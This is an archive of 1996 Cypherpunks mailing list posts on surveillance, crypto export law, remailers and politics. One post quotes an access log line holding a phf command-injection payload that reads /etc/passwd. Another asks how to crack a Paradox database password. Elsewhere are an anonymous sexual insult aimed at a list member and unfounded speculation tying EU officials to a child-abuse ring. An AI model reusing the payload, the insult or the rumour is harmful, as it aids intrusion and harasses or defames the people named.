From runnerfx at octet.com Mon Sep 23 10:13:42 1996
From: runnerfx at octet.com (Wearen Life)
Date: Tue, 24 Sep 1996 01:13:42 +0800
Subject: Go away CIA
In-Reply-To:
Message-ID:

The CIA has many powers both great and small. If they can cover up findings
of UFO's and Murders I am pretty sure they can watch some puny web server.

On Sun, 22 Sep 1996, Shane Brath wrote:

>
>
> On Sat, 21 Sep 1996, Wearen Life wrote:
>
> > I won't be surprised if they were ALSO watching who was visiting your page.
> > I think now is the time to start looking in your hard drive or floppy
> > disk for anything that may incrimanate you. (did i spell that right)?
> > My 2 cents.
>
> But how would they go about globally watching who goes to your URL, unless
> they hack into your server and look at the log, or have a network sniffer
> at an access point feeding you?
>
> > > Well well...
> > >
> > > After putting up the CIA hack mirror page on http://www.skeeve.net/cia/
> > > I learnt a few things.
> > >
> > > o it got 50,000 hits in 1 day
> > > o everyone from the cia, senate, fbi, nsa (ncsc) and every other bloody US gov
> > > department looked at it masses of times. The CIA looked at it every 10-15
> > > minutes.
> > > zztop{root}:15: cat skeeve.net-access_log | grep ucia.gov | wc -l
> > > 281
> > >
> > > o Even the CIA tries to hack you.
> > >
> > > relay1-ext.ucia.gov unknown - [21/Sep/1996:01:56:44 +1000] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 1180
> > >
> > > o Dozens of in.fingerd/in.telnetd attempts from ucia.gov, some mil sites and
> > > ncsc.mil sites.
> [ rest of text snipped ]
>

From carboy at hooked.net Mon Sep 23 10:17:00 1996
From: carboy at hooked.net (Michael E. Carboy)
Date: Tue, 24 Sep 1996 01:17:00 +0800
Subject: Snooping ISP admin??
Message-ID: <32468D68.5E2@hooked.net>

Greetings All,

Question for the group: I have encountered a situation that causes me
to believe an ISP is snooping through encrypted mail. It seems that
PGP'd mail has aroused the curiosity of an ISP (not hooked.net).. I have
encountered "POP3 account in use by another user" several times in the
past few days and I am the only user... wondering if that "in use"
message is the result of a clumsy sysadmin being caught with his hand
in the cookie jar.

Any thoughts from the group??? If those more knowledgeable than I deem
these NOISE... my sincere apologies.

regards,

Michael E. Carboy
carboy at hooked.net
carboy at carboy.com

From pgut001 at cs.auckland.ac.nz Mon Sep 23 12:57:44 1996
From: pgut001 at cs.auckland.ac.nz (pgut001 at cs.auckland.ac.nz)
Date: Tue, 24 Sep 1996 03:57:44 +0800
Subject: (Fwd) Australian "ITAR" regulations
Message-ID: <84347922911395@cs26.cs.auckland.ac.nz>

>>An anonymous opinion from inside the Defence Dept holds that electronic
>>bits on a wire do not constitute goods, and as a result if you ship
>>electronically, you are not subject to the regulations.
If you ship a >>CD or floppy or other physical media containing software, you violate the >>regulations. > >Watch out for those anonymous opinions; I received exactly the opposite >opinion when I spoke to the Defence Signals Directorate about the issue >(back in 1994) -- after specifically asking about a few hypothetical >cases. Of course, either opinion may be correct, which is the real >problem! If the DSD is anything like our GCSB then what they'll have told you is what they'd like to be the case, not what's really the case. They will tell you what it pleases them to tell you, which doesn't necessarily have anything to do with the facts. The easiest way to check the real situation is to look at your customs act, the NZ Customs Act of 1995 (which in the relevant area is almost identical to the 1966 one) covers forms of export in excruciating detail. Doesn't mention anything about computer networks in there. In practice it'd have to be decided in the courts, but I don't think the DSD will take action because there's a very good chance they'd get a ruling against them, which is also why the NSA is so reluctant to enforce the ITAR in court. Peter. From talon57 at well.com Mon Sep 23 13:52:26 1996 From: talon57 at well.com (Brian D Williams) Date: Tue, 24 Sep 1996 04:52:26 +0800 Subject: USA_exe Message-ID: <199609231527.IAA24066@well.com> John (jya at pipeline.com) posts: >The Washington Post reports at length today on the Defense >Department's disclosure yesterday of heretofore classified >training manuals used in the School of the Americas to instruct >Latino troops on killing a wide range of civilians for political >purposes. This is not particularly new news, I have a copy at home of one of these manuals, it was put out by a humans rights group that got their hands on it during all the El Salvador business. It's as nasty as it sounds... Further info on request. Brian "Semiautomatic's and Boundless Love." 
From rah at shipwright.com Mon Sep 23 14:08:23 1996 From: rah at shipwright.com (Robert Hettinga) Date: Tue, 24 Sep 1996 05:08:23 +0800 Subject: Bank for International Settlement's Security of Digital CashReport now on the web... Message-ID: --- begin forwarded text Sender: e$@thumper.vmeng.com Reply-To: Ian Grigg Precedence: Bulk Date: Mon, 23 Sep 1996 12:22:59 +0200 From: Ian Grigg To: Multiple recipients of Subject: BIS_rep Thanks to all the help I got last week, I have located the BIS report on Smart Card Security. I have C&P'd and squeezed it into HTML format. There are still many errors in it, notably many double words that C&P contributed, and I haven't touched the Annexes (messy footnotes, no graphics or headings). However, for those desparate to get their hands on it, go to our page: http://www.systemics.com/docs/papers/ and type (anti-bot protocol format): BIS_smart_security.html at the end of the URL. The real (no errors :-) document is located at: http://www.bis.org/publ/cpss18.htm but only the forward, exec summary and intro are there at the moment. When they are all there, I will drop my version. I am not really that keen on repairing the errors in my version, as I gather that BIS will make the original available some day. But last I looked, they didn't have an email address, so who can say? -- iang iang at systemics.com --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." 
-- Punishment, 100 times on a chalkboard, for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/

From frissell at panix.com Mon Sep 23 14:23:35 1996
From: frissell at panix.com (Duncan Frissell)
Date: Tue, 24 Sep 1996 05:23:35 +0800
Subject: Public Schools
Message-ID: <3.0b19.32.19960923103721.00a13340@panix.com>

On Sun, 22 Sep 1996, snow wrote:

>I would agree that parents can do as good or better at _most_
>subjects thru about the 3rd or 4th grade, and I do agree that
>most of today's schools are shit, however there is one area--
>social skills--that homeschooling simply can't compete.

From John Holt's "Teach Your Own"

"If there were no other reason to homeschool your children, protecting them
from the 'valuable social atmosphere' of the schools would be sufficient."

John was a commie liberal BTW. He felt that the schools had a very nasty
and artificial social environment with rigid age segregation that bore no
resemblance to real life where there are people of wider age ranges.

Certainly, most people suffer worse mistreatment from their "peers" at
school than they do later in life.

As a libertarian, I would add that the social atmosphere of a Stalinist
"brain factory" is not exactly the socialization I would choose for my
children. I would choose a more market oriented model.

DCF

"Even if they manage to teach nothing else, the very existence of
government schools teaches State supremacy."

From unicorn at schloss.li Mon Sep 23 14:24:52 1996
From: unicorn at schloss.li (Black Unicorn)
Date: Tue, 24 Sep 1996 05:24:52 +0800
Subject: Where to write crypto?
In-Reply-To: <3.0b19.32.19960923075240.00e9ea44@panix.com>
Message-ID:

On Mon, 23 Sep 1996, Duncan Frissell wrote:

> At 08:33 AM 9/23/96 +0200, Remo Pini wrote:
> >Switzerland has NO crypto laws (yet)...
> >
>
> However they are cooperating with the Gang of Seven (G7) Net restriction
> efforts.

Switzerland is quickly becoming a G7 puppet. This is not a new trend.

>
> See:
>
> http://www.admin.ch/ejpd/d/bj/internet/indexe.htm
>
> DCF
>

--
I hate lightning - finger for public key - Vote Monarchist
unicorn at schloss.li

From ericm at lne.com Mon Sep 23 14:25:44 1996
From: ericm at lne.com (Eric Murray)
Date: Tue, 24 Sep 1996 05:25:44 +0800
Subject: Snooping ISP admin??
In-Reply-To: <32468D68.5E2@hooked.net>
Message-ID: <199609231530.IAA14624@slack.lne.com>

Michael E. Carboy writes:
>
> Greetings All,
>
> Question for the group: I have encountered a situation that causes me
> to believe an ISP is snooping through encrypted mail. It seems that
> PGP'd mail has aroused the curiosity of an ISP (not hooked.net).. I have
> encountered "POP3 account in use by another user" several times in the
> past few days and I am the only user... wondering if that "in use"
> message is the result of a clumsy sysadmin being caught with his hand
> in the cookie jar.

It's from a clumsy programmer- popd is known to hang up
under certain conditions.

> Any thoughts from the group???

If the sysadmin is reading your PGP mail, let him.
It's very very unlikely that he has the resources available
to crack a PGP message in this century.

--
Eric Murray ericm at lne.com ericm at motorcycle.com http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03 92 E8 AC E6 7E 27 29 AF

From jya at pipeline.com Mon Sep 23 14:33:08 1996
From: jya at pipeline.com (John Young)
Date: Tue, 24 Sep 1996 05:33:08 +0800
Subject: PKI_gak
Message-ID: <199609231748.RAA03243@pipe2.ny2.usa.pipeline.com>

9-21-96. MiPa:

System and method for centralized session key distribution, privacy
enhanced messaging and information distribution using a split private
key public cryptosystem (Assignee -- Bell Atlantic Network Services, Inc.)

The method and system also provide for authorized wiretapping, video
and data distribution and private enhanced messaging (PEM).
----- http://jya.com/pkigak.txt (4 kb) PKI_gak From sunder at brainlink.com Mon Sep 23 14:34:15 1996 From: sunder at brainlink.com (Ray Arachelian) Date: Tue, 24 Sep 1996 05:34:15 +0800 Subject: A daily warning regarding Tim ... [edited] In-Reply-To: Message-ID: On Mon, 23 Sep 1996, Daniel Christopher Miskell wrote: > Can't lock him out of the list, but you can either set up a kill file, or find > something like the 3.0b version of Eudora, which has filters; you can set it up > where, if an incoming message has a certain From: string, it is transferred > directly into the Trash mail folder, which is, as a rule, cleaned up before > quitting. Sure you can. Setup Majordomo to not accept subjects of "A daily warning regarding Tim" it seems all his messages have the same subject, and it seems to be automated. We can also go asshole on this list and not allow anyone who isn't subscribe to post. ============================================================================= + ^ + | Ray Arachelian |FL| KAOS KERAUNOS KYBERNETOS |==/|\== \|/ |sunder at brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\= <--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/= /|\ | Just Say "No" to |KA|law abridging the freedom of speech' |==\|/== + v + | Janet Reno & GAK |AK| do you not understand? |======= ===================http://www.brainlink.org/~sunder/========================= ActiveX! ActiveX! Format Hard drive? Just say yes! From richieb at teleport.com Mon Sep 23 14:43:49 1996 From: richieb at teleport.com (Rich Burroughs) Date: Tue, 24 Sep 1996 05:43:49 +0800 Subject: Bernstein hearing: The Press Release Message-ID: <3.0b24.32.19960923071112.007208a8@mail.teleport.com> At 10:44 PM 9/22/96 -0700, John Gilmore wrote: [snip] >The wording there is taken directly from the controlling Supreme Court >case, which I believe is the Pentagon Papers case. I double-checked, and it is Potter Stewart from that case. 
Here's the whole paragraph: "But in the cases before us, we are asked neither to construe specific regulations nor to apply specific laws. We are asked, instead, to perform a function that the Constitution gave to the Executive, not the Judiciary. We are asked, quite simply, to prevent the publication by two newspapers of material that the Executive Branch insists should not, in the national interest, bepublished. I am convinced that the Executive is correct with respect to some of the documents involved. But I cannot say that disclosure of any of them will surely result in direct, immediate, and irreparable damage to our Nation or its people. That being so, there can under the First Amendment be but one judicial resolution of the issues before us. I join the judgments of the Court." Interestingly, Stewart says earlier: "I should suppose that moral, political, and practical considerations would dictate that a very first principle of that wisdom would be an insistence upon avoiding secrecy for its own sake. For when everything is classified, then nothing is classified, and the system becomes one to be disregarded by the cynical or the careless, and to be manipulated by those intent on self-protection or self-promotion. I should suppose, in short, that the hallmark of a truly effective internal security system would be the maximum possible disclosure, recognizing that secrecy can best be preserved only when credibility is truly maintained." http://www.nfoweb.com/folio.pgi/ussc-1/query=[field+case+name!3A!22new+york+ times!22]/doc/{@461998}/hit_headings? >The example used >in that case was the departure date and route of a ship carrying US >troops to war. The government could sue people who threatened to >publish such information, prior to publication, and have some chance >of winning the case. It's not a guarantee, just a pre-qualification. >The idea is that if they CAN'T show such a danger, they have NO chance >of winning. 
This is the beauty of Patel's earlier ruling. The fact that we are possibly talking about speech places a much stronger burden on the gov to restrict it. [snip] >The Supreme Court would ignore the prior restraint line issue anyway, >because it isn't a factor in this case. The government isn't arguing >that they have the right to prior-restrain us because of direct, >immediate and irreperable damage. Instead they argue that the >publication itself is being controlled only for its function, not for >the content of the publication, and therefore in controlling the >function, they can "incidentally" control the publication. [snip] Anyone who was at the hearing on Friday heard some form of the word "function" repeated many times. This definitely seems to be the heart of the gov's argument. I think it's not gonna float, but IANAL, either :) Rich ______________________________________________________________________ Rich Burroughs richieb at teleport.com http://www.teleport.com/~richieb See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon U.S. State Censorship Page at - http://www.teleport.com/~richieb/state New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause From jya at pipeline.com Mon Sep 23 14:45:55 1996 From: jya at pipeline.com (John Young) Date: Tue, 24 Sep 1996 05:45:55 +0800 Subject: TAG_ent Message-ID: <199609231749.RAA03296@pipe2.ny2.usa.pipeline.com> 09-21-96, MiPa: Trusted agents for open electronic commerce (Assignee -- Citibank, N.A.) Abstract: A system for open electronic commerce having a customer trusted agent securely communicating with a first money module, and a merchant trusted agent securely communicating with a second money module. Both trusted agents are capable of establishing a first cryptographically secure session, and both money modules are capable of establishing a second cryptographically secure session. 
----- http://jya.com/tagent.txt (3 kb) TAG_ent --------- Reuters, 9-19-96 -- It will be 50 to 70 years before the majority of people do their business electronically, Citicorp Chairman John Reed told a conference on electronic money and banking. Issues related to privacy and security must be resolved for electronic banking to take off. Citicorp currently considers the Internet off-limits as a place to offer banking products until the security issues are solved, he said. "The Internet is fundamentally flawed in that regard right now," Reed said. "At this moment in time at least, we at Citicorp would feel very uncomfortable accommodating any transactions on the Internet," he said. From harmon at tenet.edu Mon Sep 23 14:49:13 1996 From: harmon at tenet.edu (Dan Harmon) Date: Tue, 24 Sep 1996 05:49:13 +0800 Subject: Public Schools In-Reply-To: <324677FF.3A48@tivoli.com> Message-ID: One of the hardest things that we have to work hardest to counter-act with our twins, who attend PS, is the socialization they pick up at school. Dan From attila at primenet.com Mon Sep 23 14:49:59 1996 From: attila at primenet.com (attila) Date: Tue, 24 Sep 1996 05:49:59 +0800 Subject: Bernstein hearing: The Press Release In-Reply-To: Message-ID: <199609231808.MAA09908@InfoWest.COM> In , on 09/23/96 at 07:23 AM, Declan McCullagh said: = .Clearly, speech that makes someone uncomfortable must be banned by = .the government. = .-Declan is that what you really meant? pretty liberal is it not? this gives in to the notion that if I'm standing on the street corner with a friend discussing anarchistic libertarian theory, and the proverbial fat lady waiting to cross the street has her 'common sense' offended and sings... this is what that big government liberal philosophy (and not just tax and spend) --regulation, and more regulation. they have already 'revised' in the name of political correctness even history. 
not withstanding that 'to the victor goes the spoils and the rewriting of history,' the Feds have already brainwashed the last generation of school children, using the very element of society who disdained the government --the 60s liberal. I dunno, declan, I did not really perceive you as a brain- washed, brain dead liberal. if what you stated above is true, it is totally opposite to your stand on freedom of speech and the CDA. care to mitigate that statement or defend it in terms of free speech? -- O, what a fall there was, my countrymen! Then I, and you, and all of us fell down, Whilst bloody treason flourish'd over us. -- Shakespeare (Julius Caesar) From declan at eff.org Mon Sep 23 14:50:11 1996 From: declan at eff.org (Declan McCullagh) Date: Tue, 24 Sep 1996 05:50:11 +0800 Subject: Bernstein hearing: The Press Release In-Reply-To: Message-ID: On Sun, 22 Sep 1996, Timothy C. May wrote: > If California were to, say, ban speech critical of women's or homosexual's > rights, would not the First Amendment trump this attempt? Not necessarily. The Supreme Court has upheld Title VII's ban on workplace "harassment." The Court said it occured when "discriminatory intimidation, ridicule, and insult" in a workplace create an uncomfortable "working environment." Then there's public accomodation law, under which the (I recall) Greek owner of a privately-operated diner was held liable for using the word "nigger" where a black woman could overhear. Clearly, speech that makes someone uncomfortable must be banned by the government. -Declan (More on some of this at http://joc.mit.edu/) // declan at eff.org // I do not represent the EFF // declan at well.com // From nobody at replay.com Mon Sep 23 14:50:26 1996 From: nobody at replay.com (Anonymous) Date: Tue, 24 Sep 1996 05:50:26 +0800 Subject: The periodic word of advice about Timmy C. Maypole, the pathological liar Message-ID: <199609231805.UAA28245@basement.replay.com> When Timmy C. 
Maypole's mother gave birth to him after fucking with a bunch of sailors, she didn't know who the father was but decided to tell him that he was a Russian as the Russian sailor was the one who satisfied her the most. From merriman at amaonline.com Mon Sep 23 14:51:00 1996 From: merriman at amaonline.com (David K. Merriman) Date: Tue, 24 Sep 1996 05:51:00 +0800 Subject: Paradox db passwords/encryption Message-ID: <199609231753.KAA22705@toad.com> -----BEGIN PGP SIGNED MESSAGE----- To: cypherpunks at toad.com Date: Mon Sep 23 12:52:32 1996 Sorry to disturb everyone, but I've got a questions that is (gasp!) immediately related to crypto: Does anyone have any info on the encryption used in the Paradox (4.5 for Win) database? I've got someone that has an encrypted (well, password-protected :-) Paradox database that needs some maintenance, and the person that knew the password is now - shall we say - 'no longer with them'. Right now, doesn't matter if it's something clever, or a brute-force hack; they just need to get into the tables and such. Dave Merriman - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- PGP Email welcome, encouraged, and PREFERRED. Visit my web site at http://www.shellback.com/p/merriman for my PGP key and fingerprint "What is the sound of one hand clapping in a forest with no one there to hear it?" I use Pronto Secure (tm) PGP-fluent Email software for Windows -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMkYXlcVrTvyYOzAZAQGcxgQAleY6gXoM1n0AbYSUogW9Zo4brlHgsEHW vs3aAh+DQEaWJKc9ltXlDK94su9uJbAo3gb4cvG0EnBDifpqlS/bya7fG9KlcM6H k6REe2Ui6xBLtbjJTa5fmAjmeLYPSKnF5z6Eql8VpdZPoS0hqKZKgdyogMrai4Dx esOt90XBqVk= =hibj -----END PGP SIGNATURE----- From jya at pipeline.com Mon Sep 23 14:54:30 1996 From: jya at pipeline.com (John Young) Date: Tue, 24 Sep 1996 05:54:30 +0800 Subject: SAK_net Message-ID: <199609231550.PAA28937@pipe3.ny3.usa.pipeline.com> 9-23-96. 
WaJo: "SAIC Is Near Agreement to Buy Bellcore" Bellcore led a team that cracked RSA-129, a computer code once thought uncrackable, proving the vulnerability of such systems. It holds hundreds of patents governing numerous aspects of the U.S. infrastructure. SAIC specializes in systems integration, national security, transportation and health care. SAIC is expected to tap into Bellcore's considerable software talent as it continues to pursue new contracts. Bellcore boasts network expertise that is second to none. Bellcore also helps companies recover from network failures, and its experts are widely regarded as masters at foiling computer viruses and at the intricacies of technical standards. Those talents will no doubt add value to SAIC's considerable technical assets and expertise. ----- http://jya.com/saknet.txt (7 kb) SAK_net From raph at CS.Berkeley.EDU Mon Sep 23 14:59:44 1996 From: raph at CS.Berkeley.EDU (Raph Levien) Date: Tue, 24 Sep 1996 05:59:44 +0800 Subject: List of reliable remailers Message-ID: <199609231350.GAA29493@kiwi.cs.berkeley.edu> I operate a remailer pinging service which collects detailed information about remailer features and reliability. To use it, just finger remailer-list at kiwi.cs.berkeley.edu There is also a Web version of the same information, plus lots of interesting links to remailer-related resources, at: http://www.cs.berkeley.edu/~raph/remailer-list.html This information is used by premail, a remailer chaining and PGP encrypting client for outgoing mail. For more information, see: http://www.c2.org/~raph/premail.html For the PGP public keys of the remailers, finger pgpkeys at kiwi.cs.berkeley.edu This is the current info: REMAILER LIST This is an automatically generated listing of remailers. The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. 
You can also get this list by fingering
remailer-list at kiwi.cs.berkeley.edu.

$remailer{"extropia"} = " cpunk pgp special";
$remailer{"c2"} = " eric pgp hash reord";
$remailer{"penet"} = " penet post";
$remailer{"flame"} = " cpunk mix pgp. hash latent cut post reord";
$remailer{"mix"} = " cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = " cpunk mix pgp hash latent cut post ek";
$remailer{"ecafe"} = " cpunk mix";
$remailer{"amnesia"} = " cpunk mix pgp hash latent cut ksub";
$remailer{'alpha'} = ' alpha pgp';
$remailer{'nymrod'} = ' alpha pgp';
$remailer{"lead"} = " cpunk pgp hash latent cut ek";
$remailer{"nemesis"} = " cpunk pgp hash latent cut";
$remailer{"exon"} = " cpunk pgp hash latent cut ek";
$remailer{"vegas"} = " cpunk pgp hash latent cut";
$remailer{"haystack"} = " cpunk mix pgp hash latent cut ek";
$remailer{"ncognito"} = " mix cpunk pgp hash latent";
$remailer{"lucifer"} = " cpunk mix pgp hash latent cut ek";
$remailer{"jam"} = " cpunk mix pgp hash latent cut ek";
$remailer{"winsock"} = " cpunk pgp hash cut ksub reord";
$remailer{'nym'} = ' newnym pgp';
$remailer{"balls"} = " cpunk pgp hash latent cut ek";
$remailer{"squirrel"} = " cpunk mix pgp hash latent cut ek";
$remailer{"middle"} = " cpunk mix pgp hash middle latent cut ek reord";
$remailer{'cyber'} = ' alpha pgp';
$remailer{"dustbin"} = " cpunk pgp hash ksub latent cut ek mix reord";

catalyst at netcom.com is _not_ a remailer.
lmccarth at ducie.cs.umass.edu is _not_ a remailer.
usura at replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(cyber mix)

The alpha and nymrod nymservers are down due to abuse. However, you
can use the cyber nymserver. The nym.alias.net server will be listed
soon. See http://www.cs.berkeley.edu/~raph/n.a.n.html for details.

403 Permission denied errors have been caused by a flaky disk on the
Berkeley WWW server. Hopefully, this is fixed by now.

The penet remailer is closed.
Last update: Mon 23 Sep 96 6:46:13 PDT

remailer  email address                    history       latency  uptime
-----------------------------------------------------------------------
squirrel  mix at squirrel.owl.de           ++++.+---++   2:19:14  99.99%
jam       remailer at cypherpunks.ca       ************    16:28  99.98%
mix       mixmaster at remail.obscura.com  ++--.+-++++-  1:07:11  99.98%
cyber     alias at alias.cyberpass.net     +*+ -*-*****    29:26  99.86%
exon      remailer at remailer.nl.com      #****# #*+##     1:12  99.84%
replay    remailer at replay.com           *********+**     4:14  99.55%
dustbin   dustman at athensnet.com         ------+++-+   1:01:14  99.54%
winsock   winsock at c2.org                --++.-------  3:29:10  99.49%
lead      mix at zifi.genetics.utah.edu    ++++++-+ ++*    35:32  99.43%
extropia  remail at miron.vip.best.com     --.-.------   8:25:42  98.99%
middle    middleman at jpunix.com          - --- -- -    2:14:50  97.72%
balls     remailer at huge.cajones.com     * * *******      5:01  97.12%
haystack  haystack at holy.cow.net         ####### #--#    55:47  96.49%
amnesia   amnesia at chardos.connix.com    ----.- ----   4:41:47  94.33%

History key

* #  response in less than 5 minutes.
* *  response in less than 1 hour.
* +  response in less than 4 hours.
* -  response in less than 24 hours.
* .  response in more than 1 day.
* _  response came back too late (more than 2 days).

cpunk
    A major class of remailers. Supports Request-Remailing-To: field.

eric
    A variant of the cpunk style. Uses Anon-Send-To: instead.

penet
    The third class of remailers (at least for right now). Uses
    X-Anon-To: in the header.

pgp
    Remailer supports encryption with PGP. A period after the keyword
    means that the short name, rather than the full email address,
    should be used as the encryption key ID.

hash
    Supports ## pasting, so anything can be put into the headers of
    outgoing messages.

ksub
    Remailer always kills subject header, even in non-pgp mode.

nsub
    Remailer always preserves subject header, even in pgp mode.

latent
    Supports Matt Ghio's Latent-Time: option.

cut
    Supports Matt Ghio's Cutmarks: option.
post
    Post to Usenet using Post-To: or Anon-Post-To: header.
ek
    Encrypt responses in reply blocks using Encrypt-Key: header.
special
    Accepts only pgp encrypted messages.
mix
    Can accept messages in Mixmaster format.
reord
    Attempts to foil traffic analysis by reordering messages. Note: I'm relying on the word of the remailer operator here, and haven't verified the reord info myself.
mon
    Remailer has been known to monitor contents of private email.
filter
    Remailer has been known to filter messages based on content. If not listed in conjunction with mon, then only messages destined for public forums are subject to filtering.

Raph Levien

From DMiskell at envirolink.org Mon Sep 23 15:03:08 1996
From: DMiskell at envirolink.org (Daniel Christopher Miskell)
Date: Tue, 24 Sep 1996 06:03:08 +0800
Subject: Public Schools
Message-ID:

>An awful lot of accomplished persons grew up in isolated areas, on small
>farms, and were educated in very small classrooms (or at home).

I can speak of this from experience. I (currently) live in the near vicinity of a town we amiably named "cowtown", and used to go to a small town high school. As it turns out, one of the graduates before me at that school went on to become an astronaut -- after living in almost-vacant "cowtown" all his life. Makes /me/ proud to be a citizen of such lightly populated areas. Besides that, it's quieter, safer, and if the government comes for me, I have a kill zone of at least 5 miles. Woohoo!

Daniel.

--
If in fact we are the only intelligent life on this planet, why the fuck are we in this goddamn mess?
--
Find my public key on the World Wide Web -- point your browser at: http://bs.mit.edu:8001/pks-toplev.html

From trei at process.com Mon Sep 23 15:03:22 1996
From: trei at process.com (Peter Trei)
Date: Tue, 24 Sep 1996 06:03:22 +0800
Subject: More proposals for European censorship
Message-ID: <199609231442.HAA20480@toad.com>

Asgaard writes:
> On Thu, 19 Sep 1996, E.
Allen Smith forwarded:
>
> >> STRASBOURG, France (Sep 19, 1996 11:24 a.m. EDT) - The European
> >> Parliament pressed the European Union on Thursday to act to curb child
> >> sex and trafficking rings, saying the fight against sexual abuse of
> >> children must be an "absolute priority."
> It's probably no coincidence that the recently busted, utter horrible
> child-molesting ring, with obvious protection from various persons
> in the establishment, was centered in Belgium - that's where the EU
> bureaucrat nomenklatura play their power games and go to bordellos.
> Asgaard

What exactly are you suggesting when you say 'it's probably no coincidence?" I can't quite figure it out.

[While I've not been following the case in detail, it involves a ring of criminals in Belgium who kidnapped children to use them in child pornography. At least two little girls were starved to death when their usefulness was over.]

Are you suggesting that someone specifically set up a ring of child pornographers/murderers in Belgium, then let it get caught, in an attempt to influence the EU parliament? Or are you suggesting that this particular gang of sub-humans was exposed at this time in an attempt to influence policy, implying that the Belgian LEAs knew about, but did not stop the ring until they needed a publicity coup?

I find such notions utterly beyond rationality. Do you expect we're going to see a statement from some Belgian police investigator to the effect of "Yes, I knew they were raping and killing children, but was told to do nothing, and I obeyed."?

There is a tendency of many on this list to demonize those we disagree with. If a person or group takes the 'wrong' stance on cryptography, key "escrow", etc, many list members will act as if that person or group were capable of any atrocity, and is acting out of the very worst of motives and hidden agendas.

Such an attitude is common, but not desirable in the modern world.
It served some purpose when war involved the literal massacre of one's opponents - it's easier to commit genocide against the tribe over the ridge if you demonize them into not-quite-humans, but in the modern world this is not a rational option.

While it's possible to regard many policies of governments, ill-informed, self-serving, populist, and wrong, to act as if there are no significant differences between real democracies and the worst authoritarian dictatorships is absurd.

Peter Trei (not representing my employer)
trei at process.com

"Your enemy is never a villain in his own eyes. Keep this in mind; it may offer a way to make him your friend. If not, you can kill him without hate -- and quickly. " - Heinlein

Recommended for US readers: "Parliament of Whores" by PJ O'Rourke

From jimbell at pacifier.com Mon Sep 23 15:06:33 1996
From: jimbell at pacifier.com (jim bell)
Date: Tue, 24 Sep 1996 06:06:33 +0800
Subject: USA_exe
Message-ID: <199609231819.LAA19661@mail.pacifier.com>

At 08:27 AM 9/23/96 -0700, Brian D Williams wrote:
>
>
>John (jya at pipeline.com) posts:
>
>>The Washington Post reports at length today on the Defense
>>Department's disclosure yesterday of heretofore classified
>>training manuals used in the School of the Americas to instruct
>>Latino troops on killing a wide range of civilians for political
>>purposes.
>
>This is not particularly new news, I have a copy at home of one of
>these manuals, it was put out by a human rights group that got
>their hands on it during all the El Salvador business.
>
>It's as nasty as it sounds...

I don't suppose we need ask the question about whether such manuals were classified to keep their contents away from the enemy...or the American people. Ooops, same thing I guess.
Jim Bell jimbell at pacifier.com From asgaard at Cor.sos.sll.se Mon Sep 23 15:11:30 1996 From: asgaard at Cor.sos.sll.se (Asgaard) Date: Tue, 24 Sep 1996 06:11:30 +0800 Subject: provably hard PK cryptosystems In-Reply-To: Message-ID: On Sun, 22 Sep 1996, Timothy C. May wrote: > Suppose a tile is placed at some place on the grid, and another tile > (possibly a different tile, possibly the same type of tile) is placed some > distance away on the grid. The problem is this: Can a "domino snake" be > found which reaches from the first tile to the second tile, with the > constraint that edges must match up on all tiles? (And all tiles must be in > normal grid locations, of course) Intuitively (but very well not, I'm not informed enough to know) this might be a suitable problem for Hellman's DNA computer, the one used for chaining the shortest route including a defined number of cities? Asgaard From asgaard at Cor.sos.sll.se Mon Sep 23 15:11:58 1996 From: asgaard at Cor.sos.sll.se (Asgaard) Date: Tue, 24 Sep 1996 06:11:58 +0800 Subject: More proposals for European censorship In-Reply-To: <199609231433.QAA20666@slld01.SLL.SE> Message-ID: On Mon, 23 Sep 1996, Peter Trei wrote: > > It's probably no coincidence that the recently busted, utter horrible > > child-molesting ring, with obvious protection from various persons > > in the establishment, was centered in Belgium - that's where the EU > > bureaucrat nomenklatura play their power games and go to bordellos. > What exactly are you suggesting when you say 'it's probably no > coincidence?" I can't quite figure it out. Obviously not only the arrested killer used the schoolgirls chained in underground cells. They were for hire. High officials used his 'services', then ordered the police to cover it up. Why else would some ten policemen be arrested? The EU bureaucrats are served by hordes of prostitutes. Surely there are pedophiles among the hordes. Probably some EU pedophiles have a connection to the gang. 
I don't know this of course, but speculation is cheap.

Asgaard

From stewarts at ix.netcom.com Mon Sep 23 15:15:30 1996
From: stewarts at ix.netcom.com (stewarts at ix.netcom.com)
Date: Tue, 24 Sep 1996 06:15:30 +0800
Subject: Snooping ISP admin??
Message-ID: <199609231830.OAA19726@attrh1.attrh.att.com>

At 06:15 AM 9/23/96 -0700, "Michael E. Carboy" wrote:
>Question for the group: I have encountered a situation that causes me
>to believe an ISP is snooping through encrypted mail. It seems that
>PGP'd mail has aroused the curiosity of an ISP (not hooked.net)..

Well, if it's encrypted, it shouldn't matter much if they're snooping :-)

>I have
>encountered "POP3 account in use by another user" several times in the
>past few days and I am the only user... wondering if that "in use"
>message is the result of a clumsy sysadmin being caught with his hand
>in the cookie jar.

Three possibilities
1) The sysadmin (unlikely). Aside from the fact that most sysadmins know better, it's easier for them to just copy your mailbox to /tmp and read it with emacs instead of using the POP handler to read it.
2) Crackers, especially if you've got a wimpy password
3) System problems - I use Eudora with my Netcom account, and sometimes I'll have bad modem connections or Windoze crashes that will hang my computer or connection in the middle of fetching mail. This leads to that kind of symptom - the server doesn't quite realize that I've hung up. Usually this times out in an hour or two, but your mileage may vary, especially depending on your ISP's POP server.

Start by assuming it's a computer problem, then try attributing stupidity, and only then go for malice. :-)

And if they are snooping, asking them about the "technical" problems you're having would at least let them know to stop it.
# Thanks; Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
#
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto

From eric at sac.net Mon Sep 23 15:18:34 1996
